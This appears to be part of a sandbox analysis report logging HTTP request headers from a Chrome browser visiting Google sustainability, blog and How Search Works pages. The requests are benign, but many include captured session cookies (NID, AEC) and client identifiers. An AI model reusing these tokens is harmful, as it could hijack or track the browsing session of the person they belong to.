            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content= HTTP/1.1Host: sustainability.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/index.min.css?cache=732a3af HTTP/1.1Host: sustainability.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sustainability.google/?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/img/glue-icons.svg HTTP/1.1Host: sustainability.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: imageReferer: https://sustainability.google/?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/img/icons.svg HTTP/1.1Host: sustainability.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: imageReferer: https://sustainability.google/?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/index.min.js?cache=47ade0f HTTP/1.1Host: sustainability.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sustainability.google/?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/img/icons.svg HTTP/1.1Host: sustainability.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/img/glue-icons.svg HTTP/1.1Host: sustainability.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/index.min.js?cache=47ade0f HTTP/1.1Host: sustainability.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /api/v2/latest/?tags=sustainability HTTP/1.1Host: www.blog.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://sustainability.googleSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://sustainability.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /api/v2/latest/?tags=sustainability HTTP/1.1Host: blog.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://sustainability.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /api/v2/latest/?tags=sustainability HTTP/1.1Host: blog.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/?fg=1 HTTP/1.1Host: google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/?fg=1 HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-prefers-color-scheme: lightAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/axwyNx0d.css HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /zVX_dAFZOrsdAax2aYItNILgBV4SU93ES5ih12EORRQ4TqiRa7eSbTllW__cwtNCypVoytKiX1opH0Nk4s3MjoB3baA9d-6kwdq2=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fvNhHugJAnsAS2DJW1V3kQ-0lsCTl2eDWV9NW2p4KXStsynp7EjqGSiACH9xSdCIvPvw0z9l_L7kOtfVZH07iQuasGIGWyFqhpdY=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/MDzy0XxA.css HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/vjYgswK-.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/EWy3lfep.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/v6TSeaUt.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/_OAi-NRQ.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/rwBjrn-0.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/bAPu5B1A.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/vjYgswK-.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; 